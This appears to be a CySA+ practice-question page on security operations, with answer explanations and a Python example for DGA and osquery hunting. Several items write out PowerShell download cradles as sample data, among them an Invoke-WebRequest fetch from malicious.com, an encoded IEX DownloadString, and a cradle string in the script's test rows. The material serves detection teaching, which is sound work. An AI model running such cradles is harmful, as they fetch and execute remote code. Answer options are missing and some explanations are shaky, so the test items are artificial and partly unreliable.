During a network traffic review, an analyst notices encrypted traffic to an unusual external IP address on TCP port 53. What is the most likely anomaly this indicates?
75 of 165 questions · Page 1/3 · Cysa Security Operations topic · Answers revealed
An analyst is triaging a SIEM alert that fires when a single host makes more than 100 outbound connections to unique IPs within one minute. The analyst finds that the host is a web server responding to legitimate client requests. What is the best action to reduce false positives?
A higher threshold accommodates legitimate traffic.
Why this answer
Adjusting the threshold to a higher number that accounts for normal web server traffic will reduce false positives while still detecting scanning behavior.
A security analyst is configuring a SIEM correlation rule to detect potential brute-force attacks. Which log source combination is most appropriate for this rule?
Authentication logs provide the login events, and firewall logs provide the source IPs to correlate and identify brute-force sources.
An organization wants to detect threats in their AWS environment using a cloud-native service that monitors for suspicious API calls and potential credential compromise. Which service should they use?
Correct. GuardDuty is a threat detection service.
Why this answer
AWS GuardDuty is a threat detection service that monitors for malicious activity, including suspicious API calls and credential compromise.
A threat hunter notices that a legitimate Windows binary 'rundll32.exe' is executing with network connections to an external IP address. The parent process is 'winword.exe'. Which LOLBin technique is most likely being used?
Correct. Rundll32 is used to load DLLs, and winword.exe as parent suggests malicious macro.
Why this answer
Rundll32.exe is a known LOLBin that can be used to execute DLLs. When spawned from winword.exe, it often indicates a macro-based attack loading a remote payload.
An analyst is using AWS GuardDuty and sees a finding that an EC2 instance is communicating with a known command-and-control (C2) IP address. What type of alert is this?
GuardDuty uses threat intelligence to identify C2 communication.
Why this answer
GuardDuty detects threats based on known malicious IPs, so communication with a C2 IP is a security finding indicating a potential compromise.
A security analyst is investigating an alert from Azure Sentinel that indicates a user account has logged in from a geographically improbable location. The analyst needs to determine if this is a true positive. Which TWO additional data sources should the analyst examine? (Choose TWO.)
Correct. They provide details of the login event.
Why this answer
Authentication logs show the source IP and timestamp, and threat intelligence can reveal if the IP is known malicious. Device compliance may be irrelevant, and VPN logs could explain the location.
A security analyst is tuning a SIEM rule that generates alerts for every failed login attempt. The rule is causing alert fatigue. Which TWO actions would reduce false positives while maintaining security visibility?
This groups multiple attempts into one alert, reducing noise.
Why this answer
Aggregating alerts by source IP reduces noise from individual attempts. Whitelisting known service accounts performing repeated failed logins (due to misconfigured services) also reduces false positives.
A SOC analyst is investigating an alert from AWS GuardDuty that indicates 'UnauthorizedAccess:EC2/SSHBruteForce'. The analyst reviews CloudTrail logs and sees multiple failed SSH login attempts from a single IP address. What initial triage action should the analyst take?
Blocking the source IP stops the attack without disrupting legitimate traffic.
Why this answer
The best initial action is to block the source IP address at the security group or network ACL to stop the brute force attack, then investigate further.
Which of the following is a primary benefit of using credentialed vulnerability scans over non-credentialed scans?
Credentialed scans can verify patch levels and settings.
Why this answer
Credentialed scans can access the OS and applications, allowing deeper inspection of installed software, patches, and configuration settings.
A security analyst is reviewing SIEM alerts and notices a high volume of alerts for a specific event ID that has been determined to be benign. Which action should the analyst take to reduce noise?
Suppressing known false positives reduces noise.
Why this answer
True positive alerts are genuine threats; false positives are benign. Tuning the SIEM to suppress known false positives reduces alert fatigue.
During a network traffic analysis, a security analyst observes repeated connections from an internal host to a known malicious IP on port 4444. The payload appears to be encrypted. Which type of activity is most likely indicated?
Correct. This matches C2 behavior.
Why this answer
Repeated connections to a known malicious IP on a non-standard port with encrypted payloads strongly suggest command and control (C2) beaconing.
An analyst is investigating a host that communicates with a domain using a DGA-like algorithm. The domain name appears random and resolves to different IPs over time. Which threat-hunting technique would best identify the DGA pattern?
Correct. DNS log analysis can reveal DGA patterns via high-entropy domains.
Why this answer
DGA domains can be detected by analyzing DNS query patterns for algorithmic generation, often using frequency analysis or ML models.
During a threat hunting exercise, an analyst uses osquery to query process events on endpoints. They discover a process named 'svchost.exe' running under a user account with parent process 'cmd.exe'. Which of the following describes this observation?
Attackers often use svchost.exe as a LOLBin, and the unusual parent cmd.exe suggests malicious activity.
Why this answer
svchost.exe should normally run under SYSTEM or NETWORK SERVICE with 'services.exe' as parent. A user-level svchost.exe with cmd.exe parent indicates a potential LOLBin misuse.
A security analyst is creating a YARA rule to detect a specific malware strain that uses a unique string in its code section and has a characteristic import table. The analyst wants to minimize false positives. Which THREE YARA rule elements should the analyst include?
Limiting file size helps avoid matching unrelated files of different sizes.
Why this answer
Including file size limits, a specific string, and the import table condition reduces false positives by narrowing the scope.
A security analyst is hunting for signs of lateral movement in the network. Which THREE indicators are most consistent with lateral movement techniques?
RDP from a domain controller to a workstation is unusual and may indicate lateral movement.
Why this answer
Lateral movement often involves remote execution tools (PsExec), remote service creation, and suspicious RDP connections.
A SOC analyst is triaging a SIEM alert that indicates a possible DNS tunneling attack. The alert was generated based on a correlation rule that looks for unusually high DNS query volume from a single host. Which TWO additional data sources should the analyst correlate to confirm the attack?
DNS logs contain queried domain names and response sizes, useful for detecting tunneling.
Why this answer
DNS logs can show query patterns and payload sizes. NetFlow can show data transfer volumes. Both help confirm tunneling.
A threat intelligence report indicates that a known APT group is using 'regsvr32.exe' to execute malicious code. Which detection rule type would be most effective in identifying this technique across multiple endpoints?
Sigma rules provide a generic signature format for log events, ideal for detecting regsvr32 usage in process creation logs.
Why this answer
Sigma rules are designed for log detection across SIEMs, making them suitable for detecting specific command-line patterns like regsvr32 execution.
A security analyst is reviewing an alert from a CASB that shows a user downloading a large volume of sensitive data from a cloud storage application to a personal device outside of business hours. The user's behavior is atypical. Which of the following is the most likely interpretation?
Correct. Unusual download volume and time suggest an attacker exfiltrating data.
Why this answer
Atypical data download from a cloud service to a personal device outside business hours is a strong indicator of data exfiltration.
An analyst is reviewing a CASB alert indicating that a user accessed a cloud application from a geolocation that is not typical for the organization. Which THREE additional data sources would be most helpful to determine if the activity is malicious?
They show what actions the user performed, helping to identify anomalous behavior.
Why this answer
Authentication logs show if the login was successful and from which IP; threat intel can identify if the IP is malicious; user activity logs show behavior patterns.
A security analyst is reviewing a CASB alert indicating a user is accessing a cloud storage application from an unusual location. The analyst needs to investigate further. Which TWO actions are most appropriate?
Audit logs show what actions were taken, helping determine if data was exfiltrated.
Why this answer
Checking the user's recent authentication logs can confirm if the access was legitimate. Reviewing the cloud application's audit logs can provide details on the activities performed. The other options are less relevant or too broad.
During a threat hunting exercise, an analyst creates a hypothesis that a threat actor may be using scheduled tasks for persistence. Which Windows registry key or log source should the analyst examine to confirm the hypothesis?
Event ID 4698 logs when a scheduled task is created, providing evidence of persistence.
Why this answer
Scheduled tasks live in the Windows Task Scheduler and can be listed with schtasks.exe or through the Task Scheduler API; their definitions are kept in %SystemRoot%\Tasks rather than primarily in the registry, although the registry does hold other persistence mechanisms. Examining 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule' is therefore not a standard approach. Since the question asks for a registry key or log source, the best answer is to review the Windows Security Event Log for event ID 4698 (scheduled task creation).
A security analyst notices a high number of alerts from a new detection rule that triggers on 'any outbound connection to a known malicious IP'. After investigation, the analyst finds that the IP address is from a threat intelligence feed but the connections are actually from a legitimate security scanner that was recently deployed. How should the analyst handle this?
Allowlisting legitimate sources reduces false positives while maintaining detection.
Why this answer
The alerts are false positives because the traffic is legitimate. The analyst should tune the rule to exclude the scanner's source IP addresses.
A threat hunter is analyzing EDR telemetry and discovers that the process svchost.exe spawned a child process powershell.exe. The powershell.exe then established a network connection to an external IP address. Which of the following best describes this behavior in the context of threat hunting?
Attackers use LOLBins like PowerShell to blend in; svchost as parent is unusual and indicates potential abuse.
Why this answer
Svchost.exe is a legitimate Windows process, but it should not spawn PowerShell. This is an unusual parent-child relationship often indicative of lateral movement or code injection, where attackers use svchost to execute malicious code.
A security engineer is configuring a new SIEM correlation rule to detect lateral movement. Which of the following log sources would provide the most relevant data for detecting pass-the-hash attacks?
Authentication logs record logon attempts and can reveal pass-the-hash indicators.
Why this answer
Authentication logs (e.g., Windows Security Event ID 4624) contain details about logon types (e.g., Network logon) and account names, which are crucial for detecting pass-the-hash.
A security analyst is configuring a vulnerability scanner for internal infrastructure. Management wants to minimize disruption to critical systems while ensuring accurate results. Which scan configuration should the analyst recommend?
Agent-based scans reduce network load and off-peak hours minimize disruption.
Why this answer
Credentialed scans provide more accurate results because they have deeper access to the system, but they can add load. Agent-based scans reduce network load and allow scheduling, minimizing disruption.
An analyst is tasked with creating a correlation rule in the SIEM to detect beaconing activity. Which log sources and fields are most relevant to model this behavior?
Correct. Beaconing is detected by analyzing connection frequency and regularity in firewall logs.
Why this answer
Beaconing involves periodic outbound connections, so firewall logs (source IP, destination IP, destination port) and connection timestamps are essential for detecting regularity.
An analyst needs to capture network traffic on a Linux server to investigate a potential data exfiltration. Which command-line tool is best suited for real-time packet capture and analysis?
tcpdump is the standard CLI tool for packet capture on Linux.
Why this answer
tcpdump is a powerful command-line packet analyzer for Linux, capable of capturing network traffic in real time and saving it for later analysis.
A security analyst is investigating a series of alerts from AWS GuardDuty indicating 'UnauthorizedAccess:EC2/SSHBruteForce'. The affected EC2 instance has a high CPU load. The analyst checks the security group rules and finds that SSH (port 22) is open to 0.0.0.0/0. What is the best immediate remediation action?
This reduces exposure while maintaining necessary access.
Why this answer
The instance is exposed to the internet on SSH. Restricting SSH access to known IP addresses reduces the attack surface. Creating a new security group with a narrow source range and applying it stops brute force attempts.
During a threat hunt, an analyst notices repeated DNS queries for random-looking subdomains under a legitimate domain. The domains have high entropy and never existed before. What technique is most likely being used?
Random high-entropy subdomains are characteristic of DGA.
Why this answer
Domain Generation Algorithms (DGAs) generate many random domain names to evade blocklists. C2 malware often uses DGAs.
A vulnerability scan report shows a critical vulnerability with a CVSS score of 9.8 on a web server. However, the server is only accessible from internal IP addresses and is protected by a Web Application Firewall (WAF) that blocks the attack vector. Which of the following should the analyst recommend?
The WAF mitigates the vulnerability, so risk acceptance is appropriate with documentation.
Why this answer
Compensating controls like a WAF that effectively blocks the attack reduce the risk. While patching is ideal, the vulnerability may not be immediately exploitable due to the WAF.
A threat hunter is using Velociraptor to search for signs of lateral movement across multiple endpoints. The hunter wants to identify instances where a user logged into multiple systems using the same credentials within a short time frame. Which THREE artifacts should the hunter collect from each endpoint?
Active network connections can indicate remote access tools.
Why this answer
Security Event Logs (Event ID 4624) show logon sessions, network connections show remote access, and WMI Activity logs can indicate lateral movement via WMI.
A threat hunter is analyzing network traffic and observes a system making outbound connections to multiple IP addresses on port 53 (DNS) with unusually large payload sizes. The hunter suspects DNS tunneling. Which THREE characteristics are indicative of DNS tunneling?
Typical DNS queries are small; large payloads suggest data encoding.
Why this answer
DNS tunneling often involves large payloads, high query volume to a single domain, and non-standard record types to encode data.
A security analyst is investigating a potential DNS tunneling attack. Which of the following patterns in DNS logs would most likely indicate such activity?
Long subdomains with high frequency are classic tunneling indicators.
Why this answer
DNS tunneling encodes data in subdomains, resulting in long, random-looking domain names with high query volumes to a specific domain.
A vulnerability scan report shows a critical vulnerability on a web server. The server is behind a WAF that blocks the relevant exploit payloads. According to the organization's risk management policy, what should the analyst do?
When a compensating control is effective, risk acceptance is appropriate.
Why this answer
Compensating controls like a WAF can justify accepting the risk rather than immediately patching if it would cause downtime.
A security team is reviewing cloud audit logs from AWS CloudTrail and notices repeated API calls to create EC2 instances in a region where the organization has no presence. What is the most likely cause?
Attackers often use compromised keys to spin up resources for cryptomining.
Why this answer
Unauthorized API calls to create resources in unusual regions often indicate compromised credentials or an attacker using the account for cryptomining.
An analyst is investigating an EDR alert showing that 'powershell.exe' was launched by 'winword.exe' with the command: 'powershell -Command Invoke-WebRequest -Uri http://malicious.com/payload.ps1 -OutFile C:\Users\Public\payload.ps1'. Which LOLBin technique is being observed?
PowerShell is used to download and save a payload, a common LOLBin technique.
Why this answer
The attack chain involves a Microsoft Office document (winword.exe) launching PowerShell to download a payload. This is a classic LOLBin technique using PowerShell for code execution and download cradles.
A security analyst is reviewing a NetFlow record that shows a large amount of data being transferred from an internal server to an external IP address on port 443 during non-business hours. Which type of activity should the analyst suspect?
Unusual outbound data transfer on an encrypted channel is a classic exfiltration indicator.
Why this answer
Large data transfers to an external IP on an encrypted channel (HTTPS) during off-hours are a common indicator of data exfiltration.
Which of the following is a persistence mechanism that involves modifying the Windows Registry to execute a program when a user logs in?
Run keys in the Registry execute programs at logon.
Why this answer
The 'Run' registry key is commonly used to launch programs automatically at user logon, making it a persistence mechanism.
A SOC analyst receives an alert from the SIEM indicating a high volume of outbound traffic from a single workstation to an IP address in a country where the organization does no business. The alert is based on a rule that triggers when outbound traffic exceeds 1 GB in 5 minutes. Upon investigation, the analyst finds that the workstation is used by a developer who downloaded a large dataset from a cloud storage service. Which action should the analyst take to improve the alert's accuracy without disabling it entirely?
Whitelisting legitimate IPs reduces false positives while maintaining detection for other IPs.
Why this answer
The alert is a false positive because legitimate activity triggered it. The best approach is to tune the rule to exclude known cloud storage IP addresses or increase the threshold to reduce noise while still detecting true exfiltration.
A security analyst is tuning a SIEM rule that triggers on any process creation event involving 'rundll32.exe'. The rule generates many false positives from legitimate software updates. Which tuning action would most effectively reduce false positives while maintaining detection of malicious use?
Excluding known legitimate activity reduces false positives while keeping the rule active.
Why this answer
Creating an exception list for known legitimate processes or command lines that use rundll32.exe reduces false positives. The best approach, however, is to modify the rule to include specific conditions, such as parent process or command-line arguments, that indicate malicious activity.
A security analyst is investigating an alert from AWS GuardDuty that indicates an EC2 instance is communicating with a known malicious IP address on port 4444. The analyst checks the VPC Flow Logs and confirms the traffic. Which of the following is the most appropriate immediate action?
Correct. Isolation stops traffic while preserving the instance for investigation.
Why this answer
Isolating the EC2 instance by applying a restrictive security group stops the malicious communication and allows further investigation.
Correct. Large DNS queries with random subdomains to a fixed IP are indicative of DNS tunneling.
Why this answer
DNS tunneling uses the DNS protocol to exfiltrate data by encoding it in DNS queries, often with random-looking subdomains.
During a threat hunt, an analyst uses Velociraptor to collect forensic artifacts from endpoints. Which THREE of the following artifacts are most useful for detecting persistence mechanisms?
Attackers often create scheduled tasks for persistence.
Why this answer
Scheduled tasks, registry Run keys, and service configurations are common persistence locations used by attackers.
During a cloud security investigation, an analyst notices that an AWS IAM user generated multiple 'CreateKeyPair' API calls from an IP address outside the corporate network. Which AWS service is best suited to detect this type of anomalous behavior?
GuardDuty is designed to detect suspicious API activity.
Why this answer
AWS GuardDuty uses machine learning and threat intelligence to detect anomalous API activity, including unauthorized key creation, via CloudTrail logs.
A threat hunter is reviewing endpoint telemetry and sees a process 'svchost.exe' spawning 'cmd.exe', which then executes 'reg.exe add' to create a Run key. The hunter suspects persistence. Which TWO artifacts should the hunter examine to confirm persistence?
The command explicitly adds a Run key, so checking the registry is necessary.
Why this answer
Run keys are stored in the registry, and scheduled tasks can also be created via command line. Examining these confirms persistence.
An EDR agent reports that the process 'svchost.exe' spawned 'powershell.exe' with the command line: 'powershell -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4AMQAwAC8AcABhAHkAbABvAGEAZAAuAGUAeABlACcAKQA='. Which of the following is the most appropriate classification for this activity?
Correct. PowerShell is a LOLBin used for execution, and svchost.exe as parent is abnormal.
Why this answer
The encoded command decodes to 'IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.10/payload.exe')', which is a download cradle. Svchost.exe spawning PowerShell with such a command is highly suspicious and indicative of a true positive.
A SOC team is evaluating cloud-native security monitoring tools. Which TWO of the following are AWS services specifically designed for threat detection and security monitoring?
GuardDuty continuously monitors for malicious activity.
Why this answer
AWS GuardDuty is a threat detection service, and Security Hub aggregates security findings. Other services like CloudTrail are for logging, not primarily detection.
An analyst is reviewing NetFlow data and notices a large amount of data being transferred from an internal database server to an external IP address on port 443 during non-business hours. The database server is not expected to initiate outbound connections. Which type of activity is most likely occurring?
The characteristics match data being stolen.
Why this answer
The data transfer is large, to an external IP, on an encrypted port, outside business hours, and from a server that shouldn't initiate outbound connections. This strongly suggests data exfiltration.
An analyst is creating a detection rule for lateral movement using SMB. Which two network indicators should be included in the rule? (Choose two.)
Lateral movement often involves SMB between workstations, not just server-to-client traffic.
Why this answer
Lateral movement over SMB often involves file writes to admin shares (IPC$) and unusual SMB traffic patterns.
During a vulnerability scan of internal hosts, a security analyst finds a critical vulnerability with a CVSS score of 9.8. The affected system is a legacy application that cannot be patched immediately. What should the analyst do next?
Compensating controls reduce risk while awaiting a permanent fix.
Why this answer
The analyst should document the finding and apply compensating controls, such as network segmentation or firewall rules, to mitigate risk until a patch can be applied.
A YARA rule is created to detect a specific malware family. The rule uses the string "MZ" at offset 0 and the string "malware" somewhere in the file. The analyst finds that many legitimate executables trigger the rule. What is the most effective way to reduce false positives?
Correct. Adding constraints like size or entry point reduces false positives.
Why this answer
Adding conditions like file size or entry point constraints narrows the rule to specific malware characteristics, reducing false positives from benign files.
An analyst is tuning a SIEM rule that triggers on failed logins. Which TWO modifications would most effectively reduce false positives without missing actual brute-force attacks? (Select TWO.)
Correct. External source IPs are more likely to be attackers; internal failures may be benign.
Why this answer
Limiting to remote logins reduces false positives from local console failures. Adding a threshold (e.g., >5) ensures only excessive failures alert, reducing noise from single failures.
A SIEM alert is generated for a user who logged into a workstation at 2:00 AM, which is outside their normal working hours. The user's manager confirms the user was on call and had legitimate reason to log in. How should the analyst classify this alert?
Correct. The alert is triggered on benign activity.
Why this answer
The alert is a false positive because the activity is legitimate despite being outside normal hours.
Which log source would best help detect an attacker using a domain generation algorithm (DGA) to communicate with a command and control server?
DNS logs contain the domains being queried, enabling detection of DGA patterns.
Why this answer
DGA generates many random domain names, which are often visible in DNS query logs. Analyzing DNS logs for high volumes of NXDOMAIN responses or unusual domain patterns can indicate DGA activity.
During an incident response, an analyst identifies suspicious registry modifications in the 'Run' key and a scheduled task that executes a script. Which three persistence mechanisms are most likely being used? (Choose three.)
Services can be created to run malicious code automatically.
Why this answer
Run keys, scheduled tasks, and services are common persistence mechanisms. Startup folders are also common but not listed as a separate option here.
During a threat hunting engagement, a hunter creates a hypothesis that adversaries may be using PowerShell to perform reconnaissance via Active Directory cmdlets. The hunter decides to look for events where PowerShell loaded the ActiveDirectory module. Which of the following detection techniques is most appropriate?
Correct. Event ID 4104 logs PowerShell script blocks and can indicate module loading.
Why this answer
Sigma rules are designed for log-based detection and can be used to detect module loading events across multiple log sources.
An analyst is reviewing logs from multiple sources and sees that a user logged into a workstation at 8:00 AM, then the same user logged into a server in a different building at 8:01 AM. The authentication logs show the same source IP for both logins. What should the analyst suspect?
The attacker likely used harvested credentials from the workstation to authenticate to the server.
Why this answer
It's physically impossible to travel between buildings in one minute. The same source IP suggests a possible pass-the-hash or credential relay attack from the workstation to the server.
A vulnerability scan of an internal web server shows a critical vulnerability with a CVSS score of 9.8. The server is behind a WAF and is only accessible from internal IPs. Which of the following is the best next step?
WAF and network segmentation reduce risk; a risk assessment determines the urgency.
Why this answer
A CVSS score reflects severity but not exploitability in the specific environment. Compensating controls (WAF, network ACLs) may reduce the risk, so a risk assessment is needed before patching.
A security analyst is investigating a potential data exfiltration incident. They notice a host sending large amounts of data to an external IP address using DNS queries. Which technique is most likely being used?
DNS tunneling uses DNS protocol to exfiltrate data.
Why this answer
DNS tunneling encodes data in DNS queries and responses, allowing exfiltration over port 53, which is often allowed through firewalls.
During a threat hunt, an analyst identifies a suspicious process that is making outbound connections to multiple IP addresses on port 443 using TLS. The analyst suspects data exfiltration. Which THREE techniques would best help confirm this hypothesis?
Correlation of file access with network connections strengthens exfiltration evidence.
Why this answer
Analyzing NetFlow/IPFIX data can reveal volume patterns indicative of exfiltration. Inspecting the TLS certificate or handshake can identify whether it is a legitimate service. Checking EDR for file access events can show if sensitive files were read before the connections.
The other options are less direct.
A threat hunter is creating a hypothesis based on recent threat intelligence about a new ransomware variant that uses scheduled tasks for persistence. Which of the following MITRE ATT&CK techniques should the hunter focus on?
This technique covers persistence via scheduled tasks.
Why this answer
Scheduled tasks are a persistence technique (T1053.005) in the MITRE ATT&CK framework. The hunter should look for unusual scheduled tasks.
A security analyst is investigating a potential data exfiltration incident. Network traffic analysis shows large outbound data transfers to an external IP address on port 443. The analyst wants to determine if the data was encrypted. Which THREE tools or techniques should the analyst use?
Wireshark can decode packets and show if traffic is encrypted (e.g., TLS).
Why this answer
Wireshark can capture and analyze packets, NetFlow provides flow-level metadata, and examining TLS handshake can determine encryption.
An analyst is investigating a potential memory injection attack on a Windows system. Which of the following memory analysis artifacts is most indicative of code injection?
RWX memory regions are often used to host injected shellcode.
Why this answer
A process that is executing in a region of memory that is both writable and executable (RWX) is a strong indicator of injected code, as legitimate processes typically have separate write and execute permissions.
A security team is configuring a vulnerability scanner for external scanning of their public-facing web applications. Which scan type will provide the most accurate assessment of vulnerabilities without requiring credentials?
Correct. External scans simulate an attacker and do not require credentials.
Why this answer
An external scan assesses the attack surface from the internet perspective, typically without credentials. Agent-based and authenticated scans require credentials or internal access.
A security analyst is reviewing a SIEM alert that triggered on a single failed login attempt from an internal IP address. The username used does not exist in Active Directory. The analyst checks the source IP and finds it belongs to a known vulnerability scanner. What classification should the analyst assign to this alert?
Correct. The alert is triggered by authorized scanning activity, so it is a false positive.
Why this answer
The alert was triggered by a known vulnerability scanner attempting to enumerate usernames. This is expected behavior and not malicious, so it is a false positive.
During a threat hunt, an analyst uses osquery to query endpoints for processes that have spawned from Microsoft Word but have network connections. Which of the following TTPs does this technique most likely detect?
Macro-enabled documents can spawn suspicious child processes.
Why this answer
Attackers often use macro-enabled documents to execute code, making Word spawn abnormal child processes like PowerShell or cmd.exe, which then connect outbound.
During a threat hunting exercise, a hunter creates a hypothesis that a threat actor is using PowerShell to download payloads from a remote server. Which ATT&CK technique is the hunter most likely investigating?
Ingress Tool Transfer describes the act of downloading tools or payloads from a remote server.
Why this answer
This maps to two ATT&CK techniques: T1059.001 (Command and Scripting Interpreter: PowerShell) for the execution mechanism and T1105 (Ingress Tool Transfer) for the download itself. Because the hypothesis is specifically about payloads being downloaded from a remote server, T1105 is the primary technique under investigation.
During a network traffic analysis, a security analyst notices a high volume of DNS queries to a domain that is algorithmically generated. The domain names follow a random pattern and are not resolved to known IP addresses. Which technique is most likely being used?
DGAs produce random domain names to communicate with C2 servers.
Why this answer
Domain Generation Algorithms (DGAs) let malware compute a large list of candidate C2 domain names from a seed (often the date), of which the operator registers only a few, so static blocklists never keep up. Most of the generated names do not resolve, which is why a burst of NXDOMAIN responses for high-entropy, vowel-poor names from a single host is the hunting signal.
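As an added example (not from the original page), the script below applies that signal to a constructed resolver log: it scores each registrable label for length, vowel and digit ratio and character entropy, then aggregates per client and flags hosts whose queries are mostly NXDOMAIN and mostly generated-looking. The log format (`client domain qtype rcode`), the sample hosts and domains, and every threshold are assumptions made for the example; real DGA families and resolver logs will need the thresholds tuned, and the label extraction assumes a one-label TLD.

```python
import math
from collections import defaultdict

VOWELS = set("aeiou")


def entropy(s: str) -> float:
    """Shannon entropy of a string in bits per character."""
    return -sum(s.count(c) / len(s) * math.log2(s.count(c) / len(s)) for c in set(s)) if s else 0.0


def looks_generated(domain: str) -> bool:
    """Per-name heuristic on the registrable label: long, few vowels or many digits, high entropy.
    Thresholds are illustrative assumptions, not published constants."""
    labels = domain.lower().rstrip(".").split(".")
    label = labels[-2] if len(labels) >= 2 else labels[0]   # simplification: assumes a one-label TLD
    if len(label) < 10:
        return False
    vowel_ratio = sum(c in VOWELS for c in label) / len(label)
    digit_ratio = sum(c.isdigit() for c in label) / len(label)
    return entropy(label) > 3.0 and (vowel_ratio < 0.25 or digit_ratio > 0.2)


def profile_clients(log_lines, min_queries: int = 5) -> dict:
    """Aggregate resolver log lines ('client domain qtype rcode') per source host and flag hosts
    whose queries are mostly NXDOMAIN and mostly for generated-looking names."""
    stats = defaultdict(lambda: {"queries": 0, "nxdomain": 0, "generated": 0, "distinct": set()})
    for line in log_lines:
        parts = line.split()
        if len(parts) != 4:
            continue                                     # skip malformed lines rather than crash
        client, domain, _qtype, rcode = parts
        s = stats[client]
        s["queries"] += 1
        s["nxdomain"] += int(rcode == "NXDOMAIN")
        s["generated"] += int(looks_generated(domain))
        s["distinct"].add(domain.lower())
    report = {}
    for client, s in stats.items():
        n = s["queries"]
        report[client] = {
            "queries": n,
            "distinct": len(s["distinct"]),
            "nxdomain_ratio": round(s["nxdomain"] / n, 2),
            "generated_ratio": round(s["generated"] / n, 2),
            # a host must have enough queries for the ratios to mean anything
            "suspect": n >= min_queries and s["nxdomain"] / n >= 0.5 and s["generated"] / n >= 0.5,
        }
    return report


# Constructed sample log: 10.0.0.5 is infected (one generated name actually resolves, the live C2),
# 10.0.0.7 is a normal workstation, 10.0.0.9 just mistyped a domain twice.
SAMPLE_LOG = """\
10.0.0.5 xk3j9d0q2l.com A NXDOMAIN
10.0.0.5 pq7v2zt8mw.net A NXDOMAIN
10.0.0.5 h4n0bxy9qk.com A NXDOMAIN
10.0.0.5 zzt41qv0pl.org A NXDOMAIN
10.0.0.5 wr8jq2kd6n.com A NXDOMAIN
10.0.0.5 j9xq3ml0vd.net A NXDOMAIN
10.0.0.5 tk0q7z9pwx.com A NOERROR
10.0.0.5 bq2m9xz7kd.com A NXDOMAIN
10.0.0.5 www.google.com A NOERROR
10.0.0.7 www.google.com A NOERROR
10.0.0.7 login.microsoft.com A NOERROR
10.0.0.7 d1234.cloudfront.net A NOERROR
10.0.0.7 windowsupdate.com A NOERROR
10.0.0.7 outlook.office365.com A NOERROR
10.0.0.7 static.akamaihd.net AAAA NOERROR
10.0.0.9 gooogle.com A NXDOMAIN
10.0.0.9 gooogle.com A NXDOMAIN
10.0.0.9 www.google.com A NOERROR
""".splitlines()

if __name__ == "__main__":
    for client, row in profile_clients(SAMPLE_LOG).items():
        print(client, row)
```

The per-name features alone are weak (short legitimate names like `microsoft` score surprisingly high on entropy), which is why the decision is made on the per-host NXDOMAIN and generated ratios over a minimum query count rather than on any single lookup.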
During a threat hunt, an analyst queries osquery to find processes where the 'cmdline' contains ' -e ' and the parent process is not 'explorer.exe'. This query is designed to detect which technique?
The query looks for encoded PowerShell commands (-e, short for -EncodedCommand) spawned from parents other than the interactive shell, a common malicious pattern.
Why this answer
PowerShell's -EncodedCommand (also accepted in abbreviated forms such as -e, -ec and -enc) takes a base64-encoded UTF-16LE script and is widely used to hide the real command line; a parent other than explorer.exe means no user launched it interactively. A query anchored only on ' -e ' misses the other abbreviations, and decoding the operand is the next triage step.
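The following added example (not part of the original page) serves both osquery questions above, the Word-child-with-network-connection hunt and the encoded-PowerShell hunt. It builds in-memory SQLite tables with the column names of osquery's `processes` and `process_open_sockets` tables, fills them with constructed rows, runs the two queries exactly as they would be typed into osqueryi, and decodes the -EncodedCommand operand so the hunter can see what the hidden script does. The process list, PIDs, paths, the 198.51.100.7 address and the scripts are all invented for the example; `ps_encode` exists only to construct the sample rows.

```python
import base64
import re
import sqlite3

# Constructed scripts that the sample rows carry in encoded form.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
SLEEP = "Start-Sleep -Seconds 5"


def ps_encode(script: str) -> str:
    """Produce the base64 form powershell.exe expects after -EncodedCommand (UTF-16LE bytes)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def build_db() -> sqlite3.Connection:
    """In-memory stand-in for osquery, using the real column names the queries rely on."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE processes (pid INTEGER, parent INTEGER, name TEXT, path TEXT, cmdline TEXT);
        CREATE TABLE process_open_sockets (pid INTEGER, remote_address TEXT, remote_port INTEGER);
    """)
    office = r"C:\Program Files\Microsoft Office\root\Office16"
    ps = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    conn.executemany("INSERT INTO processes VALUES (?,?,?,?,?)", [
        (1000, 700, "explorer.exe", r"C:\Windows\explorer.exe", "explorer.exe"),
        (2200, 1000, "WINWORD.EXE", office + r"\WINWORD.EXE", "winword.exe /n invoice.docm"),
        (2250, 2200, "splwow64.exe", r"C:\Windows\splwow64.exe", "splwow64.exe 12288"),  # benign print helper
        (2300, 2200, "powershell.exe", ps, f"powershell.exe -nop -w hidden -e {ps_encode(CRADLE)}"),
        (2400, 1000, "powershell.exe", ps, r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
        (3100, 1000, "cmd.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe"),
        (2500, 3100, "powershell.exe", ps, f"powershell.exe -enc {ps_encode(SLEEP)}"),
    ])
    conn.executemany("INSERT INTO process_open_sockets VALUES (?,?,?)", [
        (2300, "198.51.100.7", 443),   # the Word-spawned PowerShell talking outbound
        (2400, "10.0.0.20", 445),      # the admin's backup script talking to a file server
    ])
    return conn


# Hunt 1: children of Word that hold a network connection (processes joined to itself for the parent).
WORD_CHILDREN_WITH_SOCKETS = """
SELECT c.pid, c.name, c.cmdline, s.remote_address, s.remote_port
FROM processes c
JOIN processes p ON p.pid = c.parent
JOIN process_open_sockets s ON s.pid = c.pid
WHERE LOWER(p.name) = 'winword.exe'
  AND s.remote_address NOT IN ('', '0.0.0.0', '::')
"""

# Hunt 2: encoded PowerShell whose parent is not explorer.exe; covers the common abbreviations,
# not just ' -e '.
ENCODED_PS_ODD_PARENT = """
SELECT c.pid, p.name AS parent_name, c.cmdline
FROM processes c
JOIN processes p ON p.pid = c.parent
WHERE LOWER(c.name) = 'powershell.exe'
  AND (LOWER(c.cmdline) LIKE '% -e %' OR LOWER(c.cmdline) LIKE '% -ec %'
       OR LOWER(c.cmdline) LIKE '% -enc %' OR LOWER(c.cmdline) LIKE '% -encodedcommand %')
  AND LOWER(p.name) != 'explorer.exe'
"""

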